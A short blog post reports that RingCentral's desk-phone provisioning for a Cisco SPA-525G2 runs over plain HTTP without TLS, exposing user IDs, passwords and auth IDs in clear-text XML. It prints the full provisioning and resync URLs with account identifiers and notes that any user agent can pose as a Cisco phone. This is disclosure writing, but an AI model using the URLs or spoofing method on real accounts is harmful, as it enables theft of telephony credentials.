Recently I provisioned a Cisco SPA-525G2 Desk Phone to my RingCentral Free Trial account, and found their provisioning process is totally not secure.
When I added an existing phone on account admin portal, it prompted me to input the IP address of my IP Desk Phone. I am curious how the flow works underneath, then I dig it out and find RingCentral uses http instead of https. It doesn't provide either server side certificate or client side certificate for mutual TLS authentication. This means the provisioning data packets are exposed to hackers, and also any device can get provisioned through their provisioning portal. I am very surprised of their design from security perspective.
Phone resync URL
http://10.100.61.87/admin/resync?http://service.ringcentral.com/op/?u=1953899020&ai=803497337020&sn=$SN&pn=$PN
Proxy to their provisioning portal using HTTP
http://service.ringcentral.com/op/?u=1953899020&ai=803497337020&sn=$SN&pn=$PN
Variables in the URL will be replaced by desk Phone with serial number and product model
http://service.ringcentral.com/op/?u=1953899020&ai=803497337020&sn=CCQ214808CZ&pn=SPA525G2
If you sniff the network, you can clearly see the request and response in clear text (including user ID, password, auth ID etc info in plain XML file), and you can use any User agent to do the provisioning acting as a Cisco IP Phone.
This design worries me about their security design. I am not sure if they design by purpose or design by mistake.
No comments:
Post a Comment